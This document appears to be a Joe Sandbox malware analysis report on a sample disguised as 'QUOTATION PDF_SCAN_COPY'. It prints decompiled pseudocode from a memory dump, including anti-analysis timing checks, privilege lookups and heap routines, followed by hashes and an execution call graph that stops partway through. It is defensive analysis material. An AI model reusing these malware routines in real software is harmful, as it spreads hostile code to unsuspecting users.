                                  			E00409AA0(intOrPtr* _a4) {
				intOrPtr _v8;
				char _v24;
				char _v284;
				char _v804;
				char _v840;
				void* _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t39;
				void* _t50;
				intOrPtr* _t52;
				void* _t53;
				void* _t54;
				void* _t55;
				void* _t56;

				_t52 = _a4;
				_t39 = 0; // executed
				_t24 = E00407EA0(_t52,  &_v24); // executed
				_t54 = _t53 + 8;
				if(_t24 != 0) {
					E004080B0( &_v24,  &_v840);
					_t55 = _t54 + 8;
					do {
						E0041BE00( &_v284, 0x104);
						E0041C470( &_v284,  &_v804);
						_t56 = _t55 + 0x10;
						_t50 = 0x4f;
						while(1) {
							_t31 = E00414DE0(E00414D80(_t52, _t50),  &_v284);
							_t56 = _t56 + 0x10;
							if(_t31 != 0) {
								break;
							}
							_t50 = _t50 + 1;
							if(_t50 <= 0x62) {
								continue;
							} else {
							}
							goto L8;
						}
						_t9 = _t52 + 0x14; // 0xffffe055
						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
						_t39 = 1;
						L8:
						_t33 = E004080E0( &_v24,  &_v840);
						_t55 = _t56 + 8;
					} while (_t33 != 0 && _t39 == 0);
					_t34 = E00408160(_t52,  &_v24); // executed
					if(_t39 == 0) {
						asm("rdtsc");
						asm("rdtsc");
						_v8 = _t34 - 0 + _t34;
						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
					}
					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
					_t20 = _t52 + 0x31; // 0x5608758b
					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
					return 1;
				} else {
					return _t24;
				}
			}



















                                  0x00409aab
                                  0x00409ab3
                                  0x00409ab5
                                  0x00409aba
                                  0x00409abf
                                  0x00409ad2
                                  0x00409ad7
                                  0x00409ae0
                                  0x00409aec
                                  0x00409aff
                                  0x00409b04
                                  0x00409b07
                                  0x00409b10
                                  0x00409b22
                                  0x00409b27
                                  0x00409b2c
                                  0x00000000
                                  0x00000000
                                  0x00409b2e
                                  0x00409b32
                                  0x00000000
                                  0x00000000
                                  0x00409b34
                                  0x00000000
                                  0x00409b32
                                  0x00409b36
                                  0x00409b39
                                  0x00409b3f
                                  0x00409b41
                                  0x00409b4c
                                  0x00409b51
                                  0x00409b54
                                  0x00409b61
                                  0x00409b6c
                                  0x00409b6e
                                  0x00409b74
                                  0x00409b78
                                  0x00409b7b
                                  0x00409b7b
                                  0x00409b82
                                  0x00409b85
                                  0x00409b8a
                                  0x00409b97
                                  0x00409ac6
                                  0x00409ac6
                                  0x00409ac6

                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.834375246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_400000_QUOTATION PDF_SCAN_COPY.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9835c872434805b420af9e009800db09fa022f69ef5fa6a2d6e4e63ee433b124
                                  • Instruction ID: 290ea537485be02d779a264d5a339eceb4dab98af215cfaa17b5abd8430697b8
                                  • Opcode Fuzzy Hash: 9835c872434805b420af9e009800db09fa022f69ef5fa6a2d6e4e63ee433b124
                                  • Instruction Fuzzy Hash: FD213AB2D442095BCB21D664AD42BFF73BCAB54314F04007FE949A3182F638BF498BA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041A620 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 3 41a620-41a651 call 41af50 RtlAllocateHeap
                                  C-Code - Quality: 100%
                                  			E0041A620(intOrPtr _a4, char _a8, long _a12, long _a16) {
				void* _t10;
				void* _t15;

				E0041AF50(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t6 =  &_a8; // 0x414526
				_t10 = RtlAllocateHeap( *_t6, _a12, _a16); // executed
				return _t10;
			}





                                  0x0041a637
                                  0x0041a642
                                  0x0041a64d
                                  0x0041a651

                                  APIs
                                  • RtlAllocateHeap.NTDLL(&EA,?,00414C9F,00414C9F,?,00414526,?,?,?,?,?,00000000,00409CE3,?), ref: 0041A64D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.834375246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_400000_QUOTATION PDF_SCAN_COPY.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateHeap
                                  • String ID: &EA
                                  • API String ID: 1279760036-1330915590
                                  • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                  • Instruction ID: 51260f1f489a67c7b9949974b81657d9e18ee3442a924465d5a53260c52aa3af
                                  • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                  • Instruction Fuzzy Hash: AFE012B1200208ABDB14EF99CC41EA777ACAF88664F118559BA1C5B242C630F9118AB4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040830A Relevance: 1.6, APIs: 1, Instructions: 56threadwindowCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 201 40830a-40835a call 41be50 call 41c9f0 call 40ace0 call 414e40 210 40835c-40836e PostThreadMessageW 201->210 211 40838e-408392 201->211 212 408370-40838a call 40a470 210->212 213 40838d 210->213 212->213 213->211
                                  C-Code - Quality: 66%
                                  			E0040830A(long _a8) {
				intOrPtr _v0;
				char _v71;
				char _v72;
				void* _t12;
				int _t13;
				long _t20;
				int _t25;
				void* _t28;
				void* _t30;
				void* _t35;

				asm("out 0xdd, eax");
				_push(0x553a82f2);
				_t28 = _t30;
				_v72 = 0;
				E0041BE50( &_v71, 0, 0x3f);
				E0041C9F0( &_v72, 3);
				_t12 = E0040ACE0(_t35, _v0 + 0x1c,  &_v72); // executed
				_t13 = E00414E40(_v0 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t25 = _t13;
				if(_t25 != 0) {
					_t20 = _a8;
					_t13 = PostThreadMessageW(_t20, 0x111, 0, 0); // executed
					_t37 = _t13;
					if(_t13 == 0) {
						_t13 =  *_t25(_t20, 0x8003, _t28 + (E0040A470(_t37, 1, 8) & 0x000000ff) - 0x40, _t13);
					}
				}
				return _t13;
			}













                                  0x0040830a
                                  0x0040830c
                                  0x00408311
                                  0x0040831f
                                  0x00408323
                                  0x0040832e
                                  0x0040833e
                                  0x0040834e
                                  0x00408353
                                  0x0040835a
                                  0x0040835d
                                  0x0040836a
                                  0x0040836c
                                  0x0040836e
                                  0x0040838b
                                  0x0040838b
                                  0x0040838d
                                  0x00408392

                                  APIs
                                  • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.834375246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_400000_QUOTATION PDF_SCAN_COPY.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MessagePostThread
                                  • String ID:
                                  • API String ID: 1836367815-0
                                  • Opcode ID: b1b5faa0e56dbbe6ee21a3f4a67cd97146785ab6719bf5d5bd0875ebbfe3ae5a
                                  • Instruction ID: 2c18e938a35370b59372e2bd2f2ce4151f5cef1b3676bfb95faaf2b2add640fc
                                  • Opcode Fuzzy Hash: b1b5faa0e56dbbe6ee21a3f4a67cd97146785ab6719bf5d5bd0875ebbfe3ae5a
                                  • Instruction Fuzzy Hash: 2301AC71A8032877E720A6959C43FFE775CAB40F54F05412DFF44BA1C1E6E8690547EA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00408310 Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 216 408310-40831f 217 408328-40835a call 41c9f0 call 40ace0 call 414e40 216->217 218 408323 call 41be50 216->218 225 40835c-40836e PostThreadMessageW 217->225 226 40838e-408392 217->226 218->217 227 408370-40838a call 40a470 225->227 228 40838d 225->228 227->228 228->226
                                  C-Code - Quality: 82%
                                  			E00408310(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t21;
				intOrPtr* _t25;
				void* _t26;
				void* _t30;

				_t30 = __eflags;
				_v68 = 0;
				E0041BE50( &_v67, 0, 0x3f);
				E0041C9F0( &_v68, 3);
				_t12 = E0040ACE0(_t30, _a4 + 0x1c,  &_v68); // executed
				_t13 = E00414E40(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t25 = _t13;
				if(_t25 != 0) {
					_t21 = _a8;
					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
					_t32 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t25(_t21, 0x8003, _t26 + (E0040A470(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}












                                  0x00408310
                                  0x0040831f
                                  0x00408323
                                  0x0040832e
                                  0x0040833e
                                  0x0040834e
                                  0x00408353
                                  0x0040835a
                                  0x0040835d
                                  0x0040836a
                                  0x0040836c
                                  0x0040836e
                                  0x0040838b
                                  0x0040838b
                                  0x00000000
                                  0x0040838d
                                  0x00408392

                                  APIs
                                  • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.834375246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_400000_QUOTATION PDF_SCAN_COPY.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MessagePostThread
                                  • String ID:
                                  • API String ID: 1836367815-0
                                  • Opcode ID: b0fcd880289c8ecfbeb793961d9b547f85606b63ac5ed8a73f76917213b02706
                                  • Instruction ID: d17f8cfce065c66642409dfa920775f821b8147089a61b374e72855f6ed3688e
                                  • Opcode Fuzzy Hash: b0fcd880289c8ecfbeb793961d9b547f85606b63ac5ed8a73f76917213b02706
                                  • Instruction Fuzzy Hash: E0018471A8032877E720A6959C43FFE776C6B40F54F05412AFF04BA1C2E6A8690546EA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041A660 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 258 41a660-41a691 call 41af50 RtlFreeHeap
                                  C-Code - Quality: 100%
                                  			E0041A660(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E0041AF50(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}





                                  0x0041a66f
                                  0x0041a677
                                  0x0041a68d
                                  0x0041a691

                                  APIs
                                  • RtlFreeHeap.NTDLL(00000060,00409CE3,?,?,00409CE3,00000060,00000000,00000000,?,?,00409CE3,?,00000000), ref: 0041A68D
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.834375246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_400000_QUOTATION PDF_SCAN_COPY.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FreeHeap
                                  • String ID:
                                  • API String ID: 3298025750-0
                                  • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                  • Instruction ID: bc8b067cd83da56cee666b5c28ce04d4f8bf1b8054c0557e0bc192b3240f86e0
                                  • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                  • Instruction Fuzzy Hash: DAE012B1200208ABDB18EF99CC49EA777ACAF88764F018559BA1C5B242C630E9108AB4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041A692 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 261 41a692-41a6c8 call 41af50 ExitProcess
                                  C-Code - Quality: 47%
                                  			E0041A692() {
				void* _t13;
				void* _t16;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;
				void* _t22;

				asm("cdq");
				 *(_t13 - 0x6c61ed66) =  *(_t13 - 0x6c61ed66) >> 1;
				_t22 = _t19;
				_t20 = _t17;
				asm("movsd");
				asm("adc [ebp-0x75], dl");
				_push(_t20);
				_t21 = _t22;
				_t10 =  *((intOrPtr*)(_t21 + 8));
				_push(_t17);
				E0041AF50(_t16,  *((intOrPtr*)(_t21 + 8)),  *((intOrPtr*)(_t21 + 8)) + 0xc7c,  *((intOrPtr*)(_t10 + 0xa14)), 0, 0x36);
				ExitProcess( *(_t21 + 0xc));
			}










                                  0x0041a692
                                  0x0041a694
                                  0x0041a69b
                                  0x0041a69b
                                  0x0041a69c
                                  0x0041a69f
                                  0x0041a6a0
                                  0x0041a6a1
                                  0x0041a6a3
                                  0x0041a6ac
                                  0x0041a6ba
                                  0x0041a6c8

                                  APIs
                                  • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6C8
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.834375246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_400000_QUOTATION PDF_SCAN_COPY.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitProcess
                                  • String ID:
                                  • API String ID: 621844428-0
                                  • Opcode ID: 0ea0c4163f07a75ec50536cd3486094af5be5e176ba99f4a66db0c8d11d920aa
                                  • Instruction ID: 95e49b0149b4cbf8a92799c83021e6344855292957772ee7bd2880aa1e3e33d3
                                  • Opcode Fuzzy Hash: 0ea0c4163f07a75ec50536cd3486094af5be5e176ba99f4a66db0c8d11d920aa
                                  • Instruction Fuzzy Hash: 50E02631901600BFDB20DF28CC86EC73BA8AF0A350F054098B82EAB641C131E601CBE0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041A7C0 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 264 41a7c0-41a7f4 call 41af50 LookupPrivilegeValueW
                                  C-Code - Quality: 100%
                                  			E0041A7C0(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				E0041AF50(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}





                                  0x0041a7da
                                  0x0041a7f0
                                  0x0041a7f4

                                  APIs
                                  • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1C2,0040F1C2,0000003C,00000000,?,00409D55), ref: 0041A7F0
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.834375246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_400000_QUOTATION PDF_SCAN_COPY.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: LookupPrivilegeValue
                                  • String ID:
                                  • API String ID: 3899507212-0
                                  • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                  • Instruction ID: b271a6b6fd8fca1a6df64550df1cef4b538e167436523c48f1a9ef262b7a55b1
                                  • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                  • Instruction Fuzzy Hash: 4FE01AB12002086BDB10DF49CC85EE737ADAF88654F018155BA0C57241C934E8118BF5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041A6A0 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0041A6A0(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				E0041AF50(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}




                                  0x0041a6a3
                                  0x0041a6ba
                                  0x0041a6c8

                                  APIs
                                  • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6C8
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.834375246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_400000_QUOTATION PDF_SCAN_COPY.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitProcess
                                  • String ID:
                                  • API String ID: 621844428-0
                                  • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                  • Instruction ID: 02052f1feec4c32fa888e0c2ff15824475a9bddcc7bd9f2d7c69f560d23a1846
                                  • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                  • Instruction Fuzzy Hash: CBD017726002187BD620EB99CC85FD777ACDF487A4F0180A9BA1C6B242C531BA108AE5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Non-executed Functions

                                  Function 00417D51 Relevance: .0, Instructions: 44COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.834375246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_400000_QUOTATION PDF_SCAN_COPY.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8e06627df81e4a019e3dd6bbdd627ddad1401a2be9c9b1dc3d6a562bcba61d70
                                  • Instruction ID: 28c52e1d003d11a12519c6f3a3f3426fa3e7f345a8316a146518f7d63305b4f0
                                  • Opcode Fuzzy Hash: 8e06627df81e4a019e3dd6bbdd627ddad1401a2be9c9b1dc3d6a562bcba61d70
                                  • Instruction Fuzzy Hash: 5EF04C321413858F8613AF58AC846D8FF619E562207152387D9649B9D1D31580578E94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00416CDE Relevance: .0, Instructions: 12COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.834375246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_400000_QUOTATION PDF_SCAN_COPY.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b4f4aeee8422566ec8adeeba67569d57c2fa8f056ee16236dd8ef450bf23e52e
                                  • Instruction ID: b45ed8e8c8f49d4353b999a8c0e6bf4483f4796af185d4cff0739ee2b220a7cf
                                  • Opcode Fuzzy Hash: b4f4aeee8422566ec8adeeba67569d57c2fa8f056ee16236dd8ef450bf23e52e
                                  • Instruction Fuzzy Hash: B3A01123F8A00802E020AC08BC023B0E33CC38BA3AC0033A3EE08B30802082C02800CC
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Execution Graph

                                  Execution Coverage:4.7%
                                  Dynamic/Decrypted Code Coverage:2%
                                  Signature Coverage:0%
                                  Total number of Nodes:590
                                  Total number of Limit Nodes:71
                                  execution_graph 33592 3529540 LdrInitializeThunk 33595 3289070 33606 328bd30 33595->33606 33597 328918c 33598 32890ab 33598->33597 33609 327ace0 33598->33609 33602 3289110 Sleep 33603 32890fd 33602->33603 33603->33597 33603->33602 33618 3288c90 LdrLoadDll 33603->33618 33619 3288ea0 LdrLoadDll 33603->33619 33607 328bd5d 33606->33607 33620 328a530 33606->33620 33607->33598 33610 327ad04 33609->33610 33611 327ad0b 33610->33611 33612 327ad40 LdrLoadDll 33610->33612 33613 3284e40 33611->33613 33612->33611 33614 3284e5a 33613->33614 33616 3284e4e 33613->33616 33614->33603 33616->33614 33627 32852c0 LdrLoadDll 33616->33627 33617 3284fac 33617->33603 33618->33603 33619->33603 33621 328a54c NtAllocateVirtualMemory 33620->33621 33623 328af50 33620->33623 33621->33607 33624 328af60 33623->33624 33626 328af82 33623->33626 33625 3284e40 LdrLoadDll 33624->33625 33625->33626 33626->33621 33627->33617 33628 328f196 33629 328f1ba 33628->33629 33632 328b9c0 33629->33632 33633 328b9e6 33632->33633 33640 3279d30 33633->33640 33635 328b9f2 33639 328ba16 33635->33639 33648 3278f30 33635->33648 33686 328a6a0 33639->33686 33641 3279d3d 33640->33641 33689 3279c80 33640->33689 33643 3279d44 33641->33643 33703 3279c20 33641->33703 33643->33635 33649 3278f57 33648->33649 34100 327b1b0 33649->34100 33651 3278f69 34104 327af00 33651->34104 33653 3278f86 33660 3278f8d 33653->33660 34175 327ae30 LdrLoadDll 33653->34175 33656 3278ffc 34120 327f400 33656->34120 33658 3279006 33659 328bf80 2 API calls 33658->33659 33682 32790f2 33658->33682 33661 327902a 33659->33661 33660->33682 34108 327f370 33660->34108 33662 328bf80 2 API calls 33661->33662 33663 327903b 33662->33663 33664 328bf80 2 API calls 33663->33664 33665 327904c 33664->33665 34132 327ca80 33665->34132 33667 3279059 33668 3284a40 8 API calls 33667->33668 33669 3279066 33668->33669 33670 3284a40 8 API calls 33669->33670 33671 3279077 33670->33671 33672 32790a5 33671->33672 33673 3279084 33671->33673 33674 3284a40 8 API calls 33672->33674 34142 327d610 33673->34142 33677 32790c1 33674->33677 33678 32790e9 33677->33678 34176 327d6b0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 33677->34176 33680 3278d00 23 API calls 33678->33680 33680->33682 33681 3279092 34158 3278d00 33681->34158 33682->33639 33687 328af50 LdrLoadDll 33686->33687 33688 328a6bf 33687->33688 33690 3279c93 33689->33690 33742 3288bb0 LdrLoadDll 33689->33742 33722 3288a60 33690->33722 33693 3279ca6 33693->33641 33694 3279c9c 33694->33693 33725 328b2a0 33694->33725 33696 3279ce3 33696->33693 33736 3279aa0 33696->33736 33698 3279d03 33743 3279620 LdrLoadDll 33698->33743 33700 3279d15 33744 3277d70 8 API calls 33700->33744 33702 3279d1b 33702->33641 34079 328b590 33703->34079 33706 328b590 LdrLoadDll 33707 3279c4b 33706->33707 33708 328b590 LdrLoadDll 33707->33708 33709 3279c61 33708->33709 33710 327f170 33709->33710 33711 327f189 33710->33711 34083 327b030 33711->34083 33713 327f19c 34087 328a1d0 33713->34087 33716 3279d55 33716->33635 33718 327f1c2 33719 327f1ed 33718->33719 34093 328a250 33718->34093 33721 328a480 2 API calls 33719->33721 33721->33716 33745 328a5f0 33722->33745 33726 328b2b9 33725->33726 33748 3284a40 33726->33748 33728 328b2d1 33729 328b2da 33728->33729 33787 328b0e0 33728->33787 33729->33696 33731 328b2ee 33731->33729 33805 3289ef0 33731->33805 34057 3277ea0 33736->34057 33738 3279ac1 33738->33698 33739 3279aba 33739->33738 34070 3278160 33739->34070 33742->33690 33743->33700 33744->33702 33746 328af50 LdrLoadDll 33745->33746 33747 3288a75 33746->33747 33747->33694 33749 3284d75 33748->33749 33750 3284a54 33748->33750 33749->33728 33750->33749 33813 3289c40 33750->33813 33753 3284b80 33816 328a350 33753->33816 33754 3284b63 33873 328a450 LdrLoadDll 33754->33873 33757 3284b6d 33757->33728 33758 3284ba7 33759 328bdb0 2 API calls 33758->33759 33760 3284bb3 33759->33760 33760->33757 33761 3284d39 33760->33761 33762 3284d4f 33760->33762 33767 3284c42 33760->33767 33763 328a480 2 API calls 33761->33763 33882 3284780 LdrLoadDll NtReadFile NtClose 33762->33882 33764 3284d40 33763->33764 33764->33728 33766 3284d62 33766->33728 33768 3284ca9 33767->33768 33770 3284c51 33767->33770 33768->33761 33769 3284cbc 33768->33769 33875 328a2d0 33769->33875 33772 3284c6a 33770->33772 33773 3284c56 33770->33773 33776 3284c6f 33772->33776 33777 3284c87 33772->33777 33874 3284640 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 33773->33874 33819 32846e0 33776->33819 33777->33764 33831 3284400 33777->33831 33779 3284c60 33779->33728 33781 3284d1c 33879 328a480 33781->33879 33782 3284c7d 33782->33728 33785 3284c9f 33785->33728 33786 3284d28 33786->33728 33788 328b0f1 33787->33788 33789 328b103 33788->33789 33790 328bd30 2 API calls 33788->33790 33789->33731 33791 328b124 33790->33791 33900 3284060 33791->33900 33793 328b170 33793->33731 33794 328b147 33794->33793 33795 3284060 3 API calls 33794->33795 33796 328b169 33795->33796 33796->33793 33932 3285380 33796->33932 33798 328b20a 33942 328ad60 33798->33942 33799 328b1fa 33799->33798 34026 328aef0 LdrLoadDll 33799->34026 33802 328b238 34021 3289eb0 33802->34021 33806 3289f0c 33805->33806 33807 328af50 LdrLoadDll 33805->33807 34051 352967a 33806->34051 33807->33806 33808 3289f27 33810 328bdb0 33808->33810 33811 328b349 33810->33811 34054 328a660 33810->34054 33811->33696 33814 328af50 LdrLoadDll 33813->33814 33815 3284b34 33814->33815 33815->33753 33815->33754 33815->33757 33817 328a36c NtCreateFile 33816->33817 33818 328af50 LdrLoadDll 33816->33818 33817->33758 33818->33817 33820 32846fc 33819->33820 33821 328a2d0 LdrLoadDll 33820->33821 33822 328471d 33821->33822 33823 3284738 33822->33823 33824 3284724 33822->33824 33826 328a480 2 API calls 33823->33826 33825 328a480 2 API calls 33824->33825 33827 328472d 33825->33827 33828 3284741 33826->33828 33827->33782 33883 328bfc0 LdrLoadDll RtlAllocateHeap 33828->33883 33830 328474c 33830->33782 33832 328444b 33831->33832 33833 328447e 33831->33833 33834 328a2d0 LdrLoadDll 33832->33834 33835 32845c9 33833->33835 33838 328449a 33833->33838 33837 3284466 33834->33837 33836 328a2d0 LdrLoadDll 33835->33836 33843 32845e4 33836->33843 33839 328a480 2 API calls 33837->33839 33840 328a2d0 LdrLoadDll 33838->33840 33841 328446f 33839->33841 33842 32844b5 33840->33842 33841->33785 33845 32844bc 33842->33845 33846 32844d1 33842->33846 33896 328a310 LdrLoadDll 33843->33896 33848 328a480 2 API calls 33845->33848 33849 32844d6 33846->33849 33853 32844ec 33846->33853 33847 328461e 33850 328a480 2 API calls 33847->33850 33851 32844c5 33848->33851 33852 328a480 2 API calls 33849->33852 33854 3284629 33850->33854 33851->33785 33855 32844df 33852->33855 33858 32844f1 33853->33858 33884 328bf80 33853->33884 33854->33785 33855->33785 33867 3284503 33858->33867 33887 328a400 33858->33887 33859 3284557 33860 328456e 33859->33860 33895 328a290 LdrLoadDll 33859->33895 33862 328458a 33860->33862 33863 3284575 33860->33863 33864 328a480 2 API calls 33862->33864 33865 328a480 2 API calls 33863->33865 33866 3284593 33864->33866 33865->33867 33868 32845bf 33866->33868 33890 328bb80 33866->33890 33867->33785 33868->33785 33870 32845aa 33871 328bdb0 2 API calls 33870->33871 33872 32845b3 33871->33872 33872->33785 33873->33757 33874->33779 33876 328af50 LdrLoadDll 33875->33876 33877 3284d04 33876->33877 33878 328a310 LdrLoadDll 33877->33878 33878->33781 33880 328af50 LdrLoadDll 33879->33880 33881 328a49c NtClose 33880->33881 33881->33786 33882->33766 33883->33830 33897 328a620 33884->33897 33886 328bf98 33886->33858 33888 328af50 LdrLoadDll 33887->33888 33889 328a41c NtReadFile 33888->33889 33889->33859 33891 328bb8d 33890->33891 33892 328bba4 33890->33892 33891->33892 33893 328bf80 2 API calls 33891->33893 33892->33870 33894 328bbbb 33893->33894 33894->33870 33895->33860 33896->33847 33898 328af50 LdrLoadDll 33897->33898 33899 328a63c RtlAllocateHeap 33898->33899 33899->33886 33901 3284071 33900->33901 33902 3284079 33900->33902 33901->33794 33931 328434c 33902->33931 34027 328cf20 33902->34027 33904 32840cd 33905 328cf20 2 API calls 33904->33905 33908 32840d8 33905->33908 33906 3284126 33909 328cf20 2 API calls 33906->33909 33908->33906 33910 328d050 3 API calls 33908->33910 34038 328cfc0 LdrLoadDll RtlAllocateHeap RtlFreeHeap 33908->34038 33911 328413a 33909->33911 33910->33908 33912 3284197 33911->33912 34032 328d050 33911->34032 33913 328cf20 2 API calls 33912->33913 33915 32841ad 33913->33915 33916 32841ea 33915->33916 33919 328d050 3 API calls 33915->33919 33917 328cf20 2 API calls 33916->33917 33918 32841f5 33917->33918 33920 328d050 3 API calls 33918->33920 33927 328422f 33918->33927 33919->33915 33920->33918 33922 3284324 34040 328cf80 LdrLoadDll RtlFreeHeap 33922->34040 33924 328432e 34041 328cf80 LdrLoadDll RtlFreeHeap 33924->34041 33926 3284338 34042 328cf80 LdrLoadDll RtlFreeHeap 33926->34042 34039 328cf80 LdrLoadDll RtlFreeHeap 33927->34039 33929 3284342 34043 